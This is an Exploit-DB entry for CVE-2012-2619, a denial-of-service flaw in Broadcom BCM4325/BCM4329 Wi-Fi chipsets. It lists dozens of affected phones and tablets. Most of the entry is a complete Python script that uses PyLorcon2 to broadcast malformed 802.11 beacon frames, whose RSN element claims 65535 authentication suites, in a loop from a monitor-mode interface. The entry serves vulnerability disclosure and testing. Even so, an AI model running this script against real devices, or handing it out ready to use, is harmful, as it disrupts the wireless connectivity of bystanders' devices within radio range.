Broadcom BCM4325 / BCM4329 Devices - Denial of Service

EDB-ID:

22739

CVE:

2012-2619

EDB Verified:

Author:

CoreLabs

Type:

dos

Exploit:   /  

Platform:

Hardware

Date:

2012-11-15

Vulnerable App: 
# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el 
investigador argentino Andrés Blanco,
# Vendor Homepage: 
# Software Link: [download link if available]
# Version: 1.0
# Tested on: 
Apple iPhone 3GS 
Apple iPod 2G 
HTC Touch Pro 2 
HTC Droid Incredible 
Samsung Spica 
Acer Liquid 
Motorola Devour 
Vehículo Ford Edge 
Dispositivos afectados con el chipset BCM4329: 
Apple iPhone 4 
Apple iPhone 4 Verizon 
Apple iPod 3G 
Apple iPad Wi-Fi 
Apple iPad 3G 
Apple iPad 2 
Apple Tv 2G 
Motorola Xoom 
Motorola Droid X2 
Motorola Atrix 
Samsung Galaxy Tab 
Samsung Galaxy S 4G 
Samsung Nexus S 
Samsung Stratosphere 
Samsung Fascinate 
HTC Nexus One 
HTC Evo 4G 
HTC ThunderBolt 
HTC Droid Incredible 2 
LG Revolution 
Sony Ericsson Xperia Play 
Pantech Breakout 
Nokia Lumina 800 
Kyocera Echo 
Asus Transformer Prime 
Malata ZPad"

# CVE : 2012-2619
#!/usr/bin/env python 

import sys 
import time 
import struct 
import PyLorcon2 

def beaconFrameGenerator(): 
    sequence = 0 
    while(1): 
        sequence = sequence % 4096 

        # Frame Control 
        frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon 
        frame += '\x00' # Flags: 0 
        frame += '\x00\x00' # Duration: 0 
        frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff 
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad 
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad 
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: 
#part of the generator 
        # Frame Body 
        frame += struct.pack('Q', time.time()) # Timestamp 
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds 
        frame += '\x11\x04' # Capability Information: ESS, Privacy, 
#Short Slot time 
        # Information Elements 
        # SSID: buggy 
        frame += '\x00\x05buggy' 
        # Supported Rates: 1,2,5.5,11,18,24,36,54 
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' 
        # DS Parameter Set: 6 
        frame += '\x03\x01\x06' 
        # RSN IE 
        frame += '\x30' # ID: 48 
        frame += '\x14' # Size: 20 
        frame += '\x01\x00' # Version: 1 
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP 
        frame += '\x01\x00' # Pairwise cipher suite count: 1 
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP 
        frame += '\xff\xff' # Authentication suites count: 65535 
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK 
        frame += '\x00\x00' 

        sequence += 1 
        yield frame 

if __name__ == "__main__": 
    if len(sys.argv) != 2: 
        print "Usage:" 
        print "\t%s <wireless interface>" % sys.argv[0] 
        sys.exit(-1) 

    iface = sys.argv[1] 
    context = PyLorcon2.Context(iface) 
    context.open_injmon() 

    generator = beaconFrameGenerator() 

    for i in range(10000): 
        frame = generator.next() 
        time.sleep(0.100) 
        context.send_bytes(frame)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services